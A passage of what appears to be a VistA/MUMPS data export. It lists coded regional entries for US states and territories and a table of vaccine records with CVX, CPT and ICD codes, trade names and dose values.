"DATA",9002084.83,76,0)
DEA01^DELAWARE-01^1
"DATA",9002084.83,77,0)
DEA02^DELAWARE-02^1
"DATA",9002084.83,78,0)
DEA03^DELAWARE-03^1
"DATA",9002084.83,79,0)
DEA04^DELAWARE-04^1
"DATA",9002084.83,80,0)
DEA05^DELAWARE-05^1
"DATA",9002084.83,81,0)
DEA06^DELAWARE-06^1
"DATA",9002084.83,82,0)
FLA01^FLORIDA-01^1
"DATA",9002084.83,83,0)
FLA02^FLORIDA-02^1
"DATA",9002084.83,84,0)
FLA03^FLORIDA-03^1
"DATA",9002084.83,85,0)
FLA04^FLORIDA-04^1
"DATA",9002084.83,86,0)
FLA05^FLORIDA-05^1
"DATA",9002084.83,87,0)
FLA06^FLORIDA-06^1
"DATA",9002084.83,88,0)
FMA01^FED STATES MICRO-01^1
"DATA",9002084.83,89,0)
FMA02^FED STATES MICRO-02^1
"DATA",9002084.83,90,0)
FMA03^FED STATES MICRO-03^1
"DATA",9002084.83,91,0)
FMA04^FED STATES MICRO-04^1
"DATA",9002084.83,92,0)
FMA05^FED STATES MICRO-05^1
"DATA",9002084.83,93,0)
FMA06^FED STATES MICRO-06^1
"DATA",9002084.83,94,0)
GAA01^GEORGIA-01^1
"DATA",9002084.83,95,0)
GAA02^GEORGIA-02^1
"DATA",9002084.83,96,0)
GAA03^GEORGIA-03^1
"DATA",9002084.83,97,0)
GAA04^GEORGIA-04^1
"DATA",9002084.83,98,0)
GAA05^GEORGIA-05^1
"DATA",9002084.83,99,0)
GAA06^GEORGIA-06^1
"DATA",9002084.83,100,0)
GUA01^GUAM-01^1
"DATA",9002084.83,101,0)
GUA02^GUAM-02^1
"DATA",9002084.83,102,0)
GUA03^GUAM-03^1
"DATA",9002084.83,103,0)
GUA04^GUAM-04^1
"DATA",9002084.83,104,0)
GUA05^GUAM-05^1
"DATA",9002084.83,105,0)
GUA06^GUAM-06^1
"DATA",9002084.83,106,0)
HIA01^HAWAII-01^1
"DATA",9002084.83,107,0)
HIA02^HAWAII-02^1
"DATA",9002084.83,108,0)
HIA03^HAWAII-03^1
"DATA",9002084.83,109,0)
HIA04^HAWAII-04^1
"DATA",9002084.83,110,0)
HIA05^HAWAII-05^1
"DATA",9002084.83,111,0)
HIA06^HAWAII-06^1
"DATA",9002084.83,112,0)
IAA01^IOWA-01^1
"DATA",9002084.83,113,0)
IAA02^IOWA-02^1
"DATA",9002084.83,114,0)
IAA03^IOWA-03^1
"DATA",9002084.83,115,0)
IAA04^IOWA-04^1
"DATA",9002084.83,116,0)
IAA05^IOWA-05^1
"DATA",9002084.83,117,0)
IAA06^IOWA-06^1
"DATA",9002084.83,118,0)
IDA01^IDAHO-01^1
"DATA",9002084.83,119,0)
IDA02^IDAHO-02^1
"DATA",9002084.83,120,0)
IDA03^IDAHO-03^1
"DATA",9002084.83,121,0)
IDA04^IDAHO-04^1
"DATA",9002084.83,122,0)
IDA05^IDAHO-05^1
"DATA",9002084.83,123,0)
IDA06^IDAHO-06^1
"DATA",9002084.83,124,0)
ILA01^ILLINOIS-01^1
"DATA",9002084.83,125,0)
ILA02^ILLINOIS-02^1
"DATA",9002084.83,126,0)
ILA03^ILLINOIS-03^1
"DATA",9002084.83,127,0)
ILA04^ILLINOIS-04^1
"DATA",9002084.83,128,0)
ILA05^ILLINOIS-05^1
"DATA",9002084.83,129,0)
ILA06^ILLINOIS-06^1
"DATA",9002084.83,130,0)
INA01^INDIANA-01^1
"DATA",9002084.83,131,0)
INA02^INDIANA-02^1
"DATA",9002084.83,132,0)
INA03^INDIANA-03^1
"DATA",9002084.83,133,0)
INA04^INDIANA-04^1
"DATA",9002084.83,134,0)
INA05^INDIANA-05^1
"DATA",9002084.83,135,0)
INA06^INDIANA-06^1
"DATA",9002084.83,136,0)
KSA01^KANSAS-01^1
"DATA",9002084.83,137,0)
KSA02^KANSAS-02^1
"DATA",9002084.83,138,0)
KSA03^KANSAS-03^1
"DATA",9002084.83,139,0)
KSA04^KANSAS-04^1
"DATA",9002084.83,140,0)
KSA05^KANSAS-05^1
"DATA",9002084.83,141,0)
KSA06^KANSAS-06^1
"DATA",9002084.83,142,0)
KYA01^KENTUCKY-01^1
"DATA",9002084.83,143,0)
KYA02^KENTUCKY-02^1
"DATA",9002084.83,144,0)
KYA03^KENTUCKY-03^1
"DATA",9002084.83,145,0)
KYA04^KENTUCKY-04^1
"DATA",9002084.83,146,0)
KYA05^KENTUCKY-05^1
"DATA",9002084.83,147,0)
KYA06^KENTUCKY-06^1
"DATA",9002084.83,148,0)
LAA01^LOUISIANA-01^1
"DATA",9002084.83,149,0)
LAA02^LOUISIANA-02^1
"DATA",9002084.83,150,0)
LAA03^LOUISIANA-03^1
"DATA",9002084.83,151,0)
LAA04^LOUISIANA-04^1
"DATA",9002084.83,152,0)
LAA05^LOUISIANA-05^1
"DATA",9002084.83,153,0)
LAA06^LOUISIANA-06^1
"DATA",9002084.83,154,0)
MAA01^MASSACHUSETTS-01^1
"DATA",9002084.83,155,0)
MAA02^MASSACHUSETTS-02^1
"DATA",9002084.83,156,0)
MAA03^MASSACHUSETTS-03^1
"DATA",9002084.83,157,0)
MAA04^MASSACHUSETTS-04^1
"DATA",9002084.83,158,0)
MAA05^MASSACHUSETTS-05^1
"DATA",9002084.83,159,0)
MAA06^MASSACHUSETTS-06^1
"DATA",9002084.83,160,0)
MDA01^MARYLAND-01^1
"DATA",9002084.83,161,0)
MDA02^MARYLAND-02^1
"DATA",9002084.83,162,0)
MDA03^MARYLAND-03^1
"DATA",9002084.83,163,0)
MDA04^MARYLAND-04^1
"DATA",9002084.83,164,0)
MDA05^MARYLAND-05^1
"DATA",9002084.83,165,0)
MDA06^MARYLAND-06^1
"DATA",9002084.83,166,0)
MEA01^MAINE-01^1
"DATA",9002084.83,167,0)
MEA02^MAINE-02^1
"DATA",9002084.83,168,0)
MEA03^MAINE-03^1
"DATA",9002084.83,169,0)
MEA04^MAINE-04^1
"DATA",9002084.83,170,0)
MEA05^MAINE-05^1
"DATA",9002084.83,171,0)
MEA06^MAINE-06^1
"DATA",9002084.83,172,0)
MHA01^REP MARS ISLANDS-01^1
"DATA",9002084.83,173,0)
MHA02^REP MARS ISLANDS-02^1
"DATA",9002084.83,174,0)
MHA03^REP MARS ISLANDS-03^1
"DATA",9002084.83,175,0)
MHA04^REP MARS ISLANDS-04^1
"DATA",9002084.83,176,0)
MHA05^REP MARS ISLANDS-05^1
"DATA",9002084.83,177,0)
MHA06^REP MARS ISLANDS-06^1
"DATA",9002084.83,178,0)
MIA01^MICHIGAN-01^1
"DATA",9002084.83,179,0)
MIA02^MICHIGAN-02^1
"DATA",9002084.83,180,0)
MIA03^MICHIGAN-03^1
"DATA",9002084.83,181,0)
MIA04^MICHIGAN-04^1
"DATA",9002084.83,182,0)
MIA05^MICHIGAN-05^1
"DATA",9002084.83,183,0)
MIA06^MICHIGAN-06^1
"DATA",9002084.83,184,0)
MNA01^MINNESOTA-01^1
"DATA",9002084.83,185,0)
MNA02^MINNESOTA-02^1
"DATA",9002084.83,186,0)
MNA03^MINNESOTA-03^1
"DATA",9002084.83,187,0)
MNA04^MINNESOTA-04^1
"DATA",9002084.83,188,0)
MNA05^MINNESOTA-05^1
"DATA",9002084.83,189,0)
MNA06^MINNESOTA-06^1
"DATA",9002084.83,190,0)
MOA01^MISSOURI-01^1
"DATA",9002084.83,191,0)
MOA02^MISSOURI-02^1
"DATA",9002084.83,192,0)
MOA03^MISSOURI-03^1
"DATA",9002084.83,193,0)
MOA04^MISSOURI-04^1
"DATA",9002084.83,194,0)
MOA05^MISSOURI-05^1
"DATA",9002084.83,195,0)
MOA06^MISSOURI-06^1
"DATA",9002084.83,196,0)
MPA01^NO. MARIANA ISLAND-01^1
"DATA",9002084.83,197,0)
MPA02^NO. MARIANA ISLAND-02^1
"DATA",9002084.83,198,0)
MPA03^NO. MARIANA ISLAND-03^1
"DATA",9002084.83,199,0)
MPA04^NO. MARIANA ISLAND-04^1
"DATA",9002084.83,200,0)
MPA05^NO. MARIANA ISLAND-05^1
"DATA",9002084.83,201,0)
MPA06^NO. MARIANA ISLAND-06^1
"DATA",9002084.83,202,0)
MSA01^MISSISSIPPI-01^1
"DATA",9002084.83,203,0)
MSA02^MISSISSIPPI-02^1
"DATA",9002084.83,204,0)
MSA03^MISSISSIPPI-03^1
"DATA",9002084.83,205,0)
MSA04^MISSISSIPPI-04^1
"DATA",9002084.83,206,0)
MSA05^MISSISSIPPI-05^1
"DATA",9002084.83,207,0)
MSA06^MISSISSIPPI-06^1
"DATA",9002084.83,208,0)
MTA01^MONTANA-01^1
"DATA",9002084.83,209,0)
MTA02^MONTANA-02^1
"DATA",9002084.83,210,0)
MTA03^MONTANA-03^1
"DATA",9002084.83,211,0)
MTA04^MONTANA-04^1
"DATA",9002084.83,212,0)
MTA05^MONTANA-05^1
"DATA",9002084.83,213,0)
MTA06^MONTANA-06^1
"DATA",9002084.83,214,0)
NCA01^NORTH CAROLINA-01^1
"DATA",9002084.83,215,0)
NCA02^NORTH CAROLINA-02^1
"DATA",9002084.83,216,0)
NCA03^NORTH CAROLINA-03^1
"DATA",9002084.83,217,0)
NCA04^NORTH CAROLINA-04^1
"DATA",9002084.83,218,0)
NCA05^NORTH CAROLINA-05^1
"DATA",9002084.83,219,0)
NCA06^NORTH CAROLINA-06^1
"DATA",9002084.83,220,0)
NDA01^NORTH DAKOTA-01^1
"DATA",9002084.83,221,0)
NDA02^NORTH DAKOTA-02^1
"DATA",9002084.83,222,0)
NDA03^NORTH DAKOTA-03^1
"DATA",9002084.83,223,0)
NDA04^NORTH DAKOTA-04^1
"DATA",9002084.83,224,0)
NDA05^NORTH DAKOTA-05^1
"DATA",9002084.83,225,0)
NDA06^NORTH DAKOTA-06^1
"DATA",9002084.83,226,0)
NEA01^NEBRASKA-01^1
"DATA",9002084.83,227,0)
NEA02^NEBRASKA-02^1
"DATA",9002084.83,228,0)
NEA03^NEBRASKA-03^1
"DATA",9002084.83,229,0)
NEA04^NEBRASKA-04^1
"DATA",9002084.83,230,0)
NEA05^NEBRASKA-05^1
"DATA",9002084.83,231,0)
NEA06^NEBRASKA-06^1
"DATA",9002084.83,232,0)
NHA01^NEW HAMPSHIRE-01^1
"DATA",9002084.83,233,0)
NHA02^NEW HAMPSHIRE-02^1
"DATA",9002084.83,234,0)
NHA03^NEW HAMPSHIRE-03^1
"DATA",9002084.83,235,0)
NHA04^NEW HAMPSHIRE-04^1
"DATA",9002084.83,236,0)
NHA05^NEW HAMPSHIRE-05^1
"DATA",9002084.83,237,0)
NHA06^NEW HAMPSHIRE-06^1
"DATA",9002084.83,238,0)
NJA01^NEW JERSEY-01^1
"DATA",9002084.83,239,0)
NJA02^NEW JERSEY-02^1
"DATA",9002084.83,240,0)
NJA03^NEW JERSEY-03^1
"DATA",9002084.83,241,0)
NJA04^NEW JERSEY-04^1
"DATA",9002084.83,242,0)
NJA05^NEW JERSEY-05^1
"DATA",9002084.83,243,0)
NJA06^NEW JERSEY-06^1
"DATA",9002084.83,244,0)
NMA01^NEW MEXICO-01^1
"DATA",9002084.83,245,0)
NMA02^NEW MEXICO-02^1
"DATA",9002084.83,246,0)
NMA03^NEW MEXICO-03^1
"DATA",9002084.83,247,0)
NMA04^NEW MEXICO-04^1
"DATA",9002084.83,248,0)
NMA05^NEW MEXICO-05^1
"DATA",9002084.83,249,0)
NMA06^NEW MEXICO-06^1
"DATA",9002084.83,250,0)
NVA01^NEVADA-01^1
"DATA",9002084.83,251,0)
NVA02^NEVADA-02^1
"DATA",9002084.83,252,0)
NVA03^NEVADA-03^1
"DATA",9002084.83,253,0)
NVA04^NEVADA-04^1
"DATA",9002084.83,254,0)
NVA05^NEVADA-05^1
"DATA",9002084.83,255,0)
NVA06^NEVADA-06^1
"DATA",9002084.83,256,0)
NYA01^NEW YORK STATE-01^1
"DATA",9002084.83,257,0)
NYA02^NEW YORK STATE-02^1
"DATA",9002084.83,258,0)
NYA03^NEW YORK STATE-03^1
"DATA",9002084.83,259,0)
NYA04^NEW YORK STATE-04^1
"DATA",9002084.83,260,0)
NYA05^NEW YORK STATE-05^1
"DATA",9002084.83,261,0)
NYA06^NEW YORK STATE-06^1
"DATA",9002084.83,262,0)
OHA01^OHIO-01^1
"DATA",9002084.83,263,0)
OHA02^OHIO-02^1
"DATA",9002084.83,264,0)
OHA03^OHIO-03^1
"DATA",9002084.83,265,0)
OHA04^OHIO-04^1
"DATA",9002084.83,266,0)
OHA05^OHIO-05^1
"DATA",9002084.83,267,0)
OHA06^OHIO-06^1
"DATA",9002084.83,268,0)
OKA01^OKLAHOMA-01^1
"DATA",9002084.83,269,0)
OKA02^OKLAHOMA-02^1
"DATA",9002084.83,270,0)
OKA03^OKLAHOMA-03^1
"DATA",9002084.83,271,0)
OKA04^OKLAHOMA-04^1
"DATA",9002084.83,272,0)
OKA05^OKLAHOMA-05^1
"DATA",9002084.83,273,0)
OKA06^OKLAHOMA-06^1
"DATA",9002084.83,274,0)
ORA01^OREGON-01^1
"DATA",9002084.83,275,0)
ORA02^OREGON-02^1
"DATA",9002084.83,276,0)
ORA03^OREGON-03^1
"DATA",9002084.83,277,0)
ORA04^OREGON-04^1
"DATA",9002084.83,278,0)
ORA05^OREGON-05^1
"DATA",9002084.83,279,0)
ORA06^OREGON-06^1
"DATA",9002084.83,280,0)
PAA01^PENNSYLVANIA-01^1
"DATA",9002084.83,281,0)
PAA02^PENNSYLVANIA-02^1
"DATA",9002084.83,282,0)
PAA03^PENNSYLVANIA-03^1
"DATA",9002084.83,283,0)
PAA04^PENNSYLVANIA-04^1
"DATA",9002084.83,284,0)
PAA05^PENNSYLVANIA-05^1
"DATA",9002084.83,285,0)
PAA06^PENNSYLVANIA-06^1
"DATA",9002084.83,286,0)
PHA01^PHILADELPHIA-01^1
"DATA",9002084.83,287,0)
PHA02^PHILADELPHIA-02^1
"DATA",9002084.83,288,0)
PHA03^PHILADELPHIA-03^1
"DATA",9002084.83,289,0)
PHA04^PHILADELPHIA-04^1
"DATA",9002084.83,290,0)
PHA05^PHILADELPHIA-05^1
"DATA",9002084.83,291,0)
PHA06^PHILADELPHIA-06^1
"DATA",9002084.83,292,0)
PRA01^PUERTO RICO-01^1
"DATA",9002084.83,293,0)
PRA02^PUERTO RICO-02^1
"DATA",9002084.83,294,0)
PRA03^PUERTO RICO-03^1
"DATA",9002084.83,295,0)
PRA04^PUERTO RICO-04^1
"DATA",9002084.83,296,0)
PRA05^PUERTO RICO-05^1
"DATA",9002084.83,297,0)
PRA06^PUERTO RICO-06^1
"DATA",9002084.83,298,0)
RIA01^RHODE ISLAND-01^1
"DATA",9002084.83,299,0)
RIA02^RHODE ISLAND-02^1
"DATA",9002084.83,300,0)
RIA03^RHODE ISLAND-03^1
"DATA",9002084.83,301,0)
RIA04^RHODE ISLAND-04^1
"DATA",9002084.83,302,0)
RIA05^RHODE ISLAND-05^1
"DATA",9002084.83,303,0)
RIA06^RHODE ISLAND-06^1
"DATA",9002084.83,304,0)
RPA01^REPUBLIC PALAU-01^1
"DATA",9002084.83,305,0)
RPA02^REPUBLIC PALAU-02^1
"DATA",9002084.83,306,0)
RPA03^REPUBLIC PALAU-03^1
"DATA",9002084.83,307,0)
RPA04^REPUBLIC PALAU-04^1
"DATA",9002084.83,308,0)
RPA05^REPUBLIC PALAU-05^1
"DATA",9002084.83,309,0)
RPA06^REPUBLIC PALAU-06^1
"DATA",9002084.83,310,0)
SCA01^SOUTH CAROLINA-01^1
"DATA",9002084.83,311,0)
SCA02^SOUTH CAROLINA-02^1
"DATA",9002084.83,312,0)
SCA03^SOUTH CAROLINA-03^1
"DATA",9002084.83,313,0)
SCA04^SOUTH CAROLINA-04^1
"DATA",9002084.83,314,0)
SCA05^SOUTH CAROLINA-05^1
"DATA",9002084.83,315,0)
SCA06^SOUTH CAROLINA-06^1
"DATA",9002084.83,316,0)
SDA01^SOUTH DAKOTA-01^1
"DATA",9002084.83,317,0)
SDA02^SOUTH DAKOTA-02^1
"DATA",9002084.83,318,0)
SDA03^SOUTH DAKOTA-03^1
"DATA",9002084.83,319,0)
SDA04^SOUTH DAKOTA-04^1
"DATA",9002084.83,320,0)
SDA05^SOUTH DAKOTA-05^1
"DATA",9002084.83,321,0)
SDA06^SOUTH DAKOTA-06^1
"DATA",9002084.83,322,0)
TBA01^SAN ANTONIO-01^1
"DATA",9002084.83,323,0)
TBA02^SAN ANTONIO-02^1
"DATA",9002084.83,324,0)
TBA03^SAN ANTONIO-03^1
"DATA",9002084.83,325,0)
TBA04^SAN ANTONIO-04^1
"DATA",9002084.83,326,0)
TBA05^SAN ANTONIO-05^1
"DATA",9002084.83,327,0)
TBA06^SAN ANTONIO-06^1
"DATA",9002084.83,328,0)
THA01^HOUSTON-01^1
"DATA",9002084.83,329,0)
THA02^HOUSTON-02^1
"DATA",9002084.83,330,0)
THA03^HOUSTON-03^1
"DATA",9002084.83,331,0)
THA04^HOUSTON-04^1
"DATA",9002084.83,332,0)
THA05^HOUSTON-05^1
"DATA",9002084.83,333,0)
THA06^HOUSTON-06^1
"DATA",9002084.83,334,0)
TNA01^TENNESSEE-01^1
"DATA",9002084.83,335,0)
TNA02^TENNESSEE-02^1
"DATA",9002084.83,336,0)
TNA03^TENNESSEE-03^1
"DATA",9002084.83,337,0)
TNA04^TENNESSEE-04^1
"DATA",9002084.83,338,0)
TNA05^TENNESSEE-05^1
"DATA",9002084.83,339,0)
TNA06^TENNESSEE-06^1
"DATA",9002084.83,340,0)
TXA01^TEXAS-01^1
"DATA",9002084.83,341,0)
TXA02^TEXAS-02^1
"DATA",9002084.83,342,0)
TXA03^TEXAS-03^1
"DATA",9002084.83,343,0)
TXA04^TEXAS-04^1
"DATA",9002084.83,344,0)
TXA05^TEXAS-05^1
"DATA",9002084.83,345,0)
TXA06^TEXAS-06^1
"DATA",9002084.83,346,0)
UTA01^UTAH-01^1
"DATA",9002084.83,347,0)
UTA02^UTAH-02^1
"DATA",9002084.83,348,0)
UTA03^UTAH-03^1
"DATA",9002084.83,349,0)
UTA04^UTAH-04^1
"DATA",9002084.83,350,0)
UTA05^UTAH-05^1
"DATA",9002084.83,351,0)
UTA06^UTAH-06^1
"DATA",9002084.83,352,0)
VAA01^VIRGINIA-01^1
"DATA",9002084.83,353,0)
VAA02^VIRGINIA-02^1
"DATA",9002084.83,354,0)
VAA03^VIRGINIA-03^1
"DATA",9002084.83,355,0)
VAA04^VIRGINIA-04^1
"DATA",9002084.83,356,0)
VAA05^VIRGINIA-05^1
"DATA",9002084.83,357,0)
VAA06^VIRGINIA-06^1
"DATA",9002084.83,358,0)
VIA01^VIRGIN ISLANDS-01^1
"DATA",9002084.83,359,0)
VIA02^VIRGIN ISLANDS-02^1
"DATA",9002084.83,360,0)
VIA03^VIRGIN ISLANDS-03^1
"DATA",9002084.83,361,0)
VIA04^VIRGIN ISLANDS-04^1
"DATA",9002084.83,362,0)
VIA05^VIRGIN ISLANDS-05^1
"DATA",9002084.83,363,0)
VIA06^VIRGIN ISLANDS-06^1
"DATA",9002084.83,364,0)
VTA01^VERMONT-01^1
"DATA",9002084.83,365,0)
VTA02^VERMONT-02^1
"DATA",9002084.83,366,0)
VTA03^VERMONT-03^1
"DATA",9002084.83,367,0)
VTA04^VERMONT-04^1
"DATA",9002084.83,368,0)
VTA05^VERMONT-05^1
"DATA",9002084.83,369,0)
VTA06^VERMONT-06^1
"DATA",9002084.83,370,0)
WAA01^WASHINGTON-01^1
"DATA",9002084.83,371,0)
WAA02^WASHINGTON-02^1
"DATA",9002084.83,372,0)
WAA03^WASHINGTON-03^1
"DATA",9002084.83,373,0)
WAA04^WASHINGTON-04^1
"DATA",9002084.83,374,0)
WAA05^WASHINGTON-05^1
"DATA",9002084.83,375,0)
WAA06^WASHINGTON-06^1
"DATA",9002084.83,376,0)
WIA01^WISCONSIN-01^1
"DATA",9002084.83,377,0)
WIA02^WISCONSIN-02^1
"DATA",9002084.83,378,0)
WIA03^WISCONSIN-03^1
"DATA",9002084.83,379,0)
WIA04^WISCONSIN-04^1
"DATA",9002084.83,380,0)
WIA05^WISCONSIN-05^1
"DATA",9002084.83,381,0)
WIA06^WISCONSIN-06^1
"DATA",9002084.83,382,0)
WVA01^WEST VIRGINIA-01^1
"DATA",9002084.83,383,0)
WVA02^WEST VIRGINIA-02^1
"DATA",9002084.83,384,0)
WVA03^WEST VIRGINIA-03^1
"DATA",9002084.83,385,0)
WVA04^WEST VIRGINIA-04^1
"DATA",9002084.83,386,0)
WVA05^WEST VIRGINIA-05^1
"DATA",9002084.83,387,0)
WVA06^WEST VIRGINIA-06^1
"DATA",9002084.83,388,0)
WYA01^WYOMING-01^1
"DATA",9002084.83,389,0)
WYA02^WYOMING-02^1
"DATA",9002084.83,390,0)
WYA03^WYOMING-03^1
"DATA",9002084.83,391,0)
WYA04^WYOMING-04^1
"DATA",9002084.83,392,0)
WYA05^WYOMING-05^1
"DATA",9002084.83,393,0)
WYA06^WYOMING-06^1
"DATA",9002084.94,101,0)
SMALLPOX^SMALLPOX^75^^^^1^^12^^^^3070831^V04.1^99.42^0^1^.5
"DATA",9002084.94,101,1)
^^^^^^^^^^^^^Smallpox vaccine
"DATA",9002084.94,102,0)
TD (ADULT)^Td-ADULT^9^^^^0^^8^TD-ADULT^90718^9,28,35,112,113,115,138,139,142^3140204^V06.5^99.38^0^1^.5
"DATA",9002084.94,102,1)
Tetanus and Diphtheria Toxoids^^^^^^^^^^^^^Tetanus and Diphtheria Toxoids, adsorbed for adult use
"DATA",9002084.94,103,0)
DTP^DTP^1^^8^^1^^1^^90701^^^V06.1^99.39^0^1^.5
"DATA",9002084.94,103,1)
Diphtheria and Tetanus Toxoids^^Tri-Immunol^^^^^^^^^^^Diphtheria, tetanus toxoids and pertussis vaccine
"DATA",9002084.94,104,0)
TETANUS TOXOID^TET TOX^35^^^^0^^1^^90703^9,28,35,112,113,115,138,139,142^3140204^V03.7^99.38^0^1^.5
"DATA",9002084.94,104,1)
Tetanus Toxoids USP For Booste^^Tetanus Toxoid USP^^^^^^^^^^^Tetanus Toxoid
"DATA",9002084.94,105,0)
TYPHOID, NOS^TYPH,NOS^91^^^^1^^12^^90714^^^V03.1^99.32^0^1^.5
"DATA",9002084.94,105,1)
^^^^^^^^^^^^^Typhoid vaccine, NOS
"DATA",9002084.94,106,0)
OPV^OPV^2^^8^^1^^2^SABIN^90712^^^V04.0^99.41^1^1^.5
"DATA",9002084.94,106,1)
Orimune^^^^^^^^^^^^^Poliovirus vaccine, live, oral
"DATA",9002084.94,107,0)
IPV^IPV^10^^7^^0^^2^SALK^90713^110^3141022^V04.0^99.41^0^1^.5
"DATA",9002084.94,107,1)
IPOL^^^^^^^^^^^^^Poliovirus vaccine, inactivated
"DATA",9002084.94,108,0)
INFLUENZA, NOS^FLU,NOS^88^^^^1^^10^^90724^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^^V04.8^99.52^0^1^.5
"DATA",9002084.94,108,1)
^^^^^^^^^^^^^Influenza virus vaccine, NOS
"DATA",9002084.94,110,0)
HEP B, NOS^HEP B,NOS^45^^6^^1^^4^RECOMBIVAX^90731^8,43,44,51,110,104^^V05.3^99.59^0^1^.5
"DATA",9002084.94,110,1)
Hepagene^^^^^^^^^^^^^Hepatitis B vaccine, NOS
"DATA",9002084.94,111,0)
MEASLES^MEASLES^5^^3^^1^^6^^90705^3,4,94^^V04.2^99.45^0^1^.5
"DATA",9002084.94,111,1)
ATTENUVAX^^^^^^^^^^^^^Measles virus vaccine
"DATA",9002084.94,113,0)
CHOLERA^CHOLERA^26^^^^1^^12^^90725^^^V03.0^99.31^0^0^.5
"DATA",9002084.94,113,1)
Generic-Intramuscular^^^^^^^^^^^^^Cholera vaccine, intramuscular
"DATA",9002084.94,114,0)
RUBELLA^RUBELLA^6^^3^^1^^6^^90706^3,4,94,38^^V04.3^99.47^0^1^.5
"DATA",9002084.94,114,1)
MERUVAX II^^^^^^^^^^^^^Rubella Virus vaccine
"DATA",9002084.94,115,0)
MUMPS^MUMPS^7^^3^^1^^6^^90704^7,94,38^^V04.6^99.46^0^0^.5
"DATA",9002084.94,115,1)
MUMPSVAX^^^^^^^^^^^^^Mumps Virus vaccine
"DATA",9002084.94,116,0)
BCG^BCG^19^^^^1^^12^^90728^^^V03.2^99.33^1^1^.5
"DATA",9002084.94,116,1)
Tice BCG^^Mycobax^^^^^^^^^^^Bacillus Calmette-Guerin vaccine^90585
"DATA",9002084.94,117,0)
MMR^MMR^3^^3^^0^^6^^90707^4,5,6,7,94,38^3120420^V06.4^99.48^0^1^.5
"DATA",9002084.94,117,1)
M-M-R II^^^^^^^^^^^^^Measles, Mumps, and Rubella virus vaccine
"DATA",9002084.94,118,0)
M/R^MR^4^^3^^1^^6^^90708^3,5,6,94,38^^V04.2^99.59^0^1^.5
"DATA",9002084.94,118,1)
M-R-VAX II^^^^^^^^^^^^^Measles and Rubella virus vaccine
"DATA",9002084.94,119,0)
PNEUMOCOCCAL^PNEUMO-PS^33^^^^0^^11^^90732^33,100,109,133^3091006^V03.82^99.55^0^1^.5
"DATA",9002084.94,119,1)
PNEUMOVAX 23^^PNU-IMUNE 23^^PPV23^^^^^^^^^Pneumococcal polysaccharide PPV23
"DATA",9002084.94,120,0)
YELLOW FEVER^YELLOW FEV^37^^^^0^^12^^90717^^3110330^V04.4^99.43^0^1^.5
"DATA",9002084.94,120,1)
YF-VAX^^^^^^^^^^^^^Yellow Fever Vaccine
"DATA",9002084.94,122,0)
RABIES, NOS^RABIES,NOS^90^^^^1^^12^^90726^^^V04.5^99.44^0^1^.5
"DATA",9002084.94,122,1)
^^^^^^^^^^^^^Rabies vaccine, NOS
"DATA",9002084.94,123,0)
DT (PEDIATRIC)^DT-PEDS^28^^8^^0^^1^^90702^9,28,35,112,113,115,138,139,142^3141022^V06.5^99.38^0^1^.5
"DATA",9002084.94,123,1)
Diphtheria and Tetanus Toxoids^^^^^^^^^^^^^Diphtheria and tetanus toxoids adsorbed for pediatric use
"DATA",9002084.94,124,0)
HIB, NOS^HIB,NOS^17^^6^^1^^3^^90737^46,47,48,49,51,110^^V03.81^99.59^0^1^.5
"DATA",9002084.94,124,1)
^^^^^^^^^^^^^Haemophilus influenza type b vaccine, conjugate NOS
"DATA",9002084.94,126,0)
HIB (HBOC)^HIBTITER^47^^6^^0^^3^HIB,HBOC^90645^17,46,48,49^3141022^V03.81^99.59^0^1^.5
"DATA",9002084.94,126,1)
HibTITER^^^^^^^^^^^^^Haemophilus influenza type b vaccine, HbOC
"DATA",9002084.94,127,0)
HIB (PRP-OMP)^PEDVAXHIB^49^^5^^0^^3^HIB,PRPOMP^90647^17,46,47,48,51^3141022^V03.81^99.59^0^1^.5
"DATA",9002084.94,127,1)
PedvaxHIB^^^^^^^^^^^^^Haemophilus influenza type b vaccine, PRP-OMP conjugate
"DATA",9002084.94,128,0)
HIB (PRP-D)^PROHIBIT^46^^6^^1^^3^HIB,PRP-D^90646^17,47,48,49^3141022^V03.81^99.59^0^0^.5
"DATA",9002084.94,128,1)
ProHIBiT^^^^^^^^^^^^^Haemophilus influenza type b vaccine, PRP-D conjugate
"DATA",9002084.94,129,0)
HBIG^HBIG^30^^^^0^^5^^90371^^^V07.2^99.14^0^1
"DATA",9002084.94,129,1)
Hepatitis B Immune Globulin (H^^^^^^^^^^^^^Hepatitis B immune globulin
"DATA",9002084.94,130,0)
IG, NOS^IG,NOS^14^^^^1^^12^^90741^^^V07.2^99.14^0^0
"DATA",9002084.94,130,1)
^^^^^^^^^^^^^Immune globulin, NOS
"DATA",9002084.94,131,0)
HEP A, NOS^HEP A,NOS^85^^3^^1^^9^^90730^52,83,84,31,104^^V05.3^99.59^0^1^.5
"DATA",9002084.94,131,1)
^^^^^^^^^^^^^Hepatitis A vaccine, NOS
"DATA",9002084.94,132,0)
VARICELLA^VARICELLA^21^^3^^0^^7^^90716^94,121^3080313^V05.4^99.59^0^1^.5
"DATA",9002084.94,132,1)
VARIVAX^^^^^^^^^^^^^Varicella virus vaccine
"DATA",9002084.94,133,0)
DTAP^DTaP^20^^6^^0^^1^DTAP^90700^106,107,110,50^3141022^V06.1^99.39^0^1^.5
"DATA",9002084.94,133,1)
Tripedia^^Infanrix^^Acel-Imune^^Certiva^^^^^^^Diphtheria, tetanus toxoids and acellular pertussis vaccine
"DATA",9002084.94,134,0)
MENINGOCOCCAL^MENING-PS^32^^^^0^^16^^90733^32,103,108,114,136,147,148^3111014^V03.89^99.59^0^1^.5
"DATA",9002084.94,134,1)
Menomume A/C/Y/W-135^^^^^^^^^^^^^Meningococcal polysaccharide vaccine
"DATA",9002084.94,135,0)
ROTAVIRUS TETRAVALENT^ROTA-4^74^^4^^1^^15^^^116,119,122^^V04.89^99.59^1^1^.5
"DATA",9002084.94,135,1)
ROTASHIELD^^^^^^^^^^^^^Rotavirus vaccine, tetravalent, live, oral
"DATA",9002084.94,136,0)
HIB (PRP-T)^ACTHIB^48^^6^^0^^3^HIB,PRP-T^90648^17,46,47,49^3141022^V03.81^99.59^0^1^.5
"DATA",9002084.94,136,1)
ActHIB^^OmniHIB^^Hiberix^^^^^^^^^Haemophilus influenza type b vaccine, PRP-T conjugate
"DATA",9002084.94,137,0)
UNKNOWN^OTHER^999^^^^1^^12^TEST^90749^^^^99.59^0^0^.5
"DATA",9002084.94,137,1)
^^^^^^^^^^^^^Unknown vaccine or immune globulin
"DATA",9002084.94,138,0)
HEP B, ADOLESCENT OR PEDIATRIC^HEP B PED^8^^6^^0^^4^^90744^43,44,45,51,110,42,104^3141022^V05.3^99.59^0^1^.5
"DATA",9002084.94,138,1)
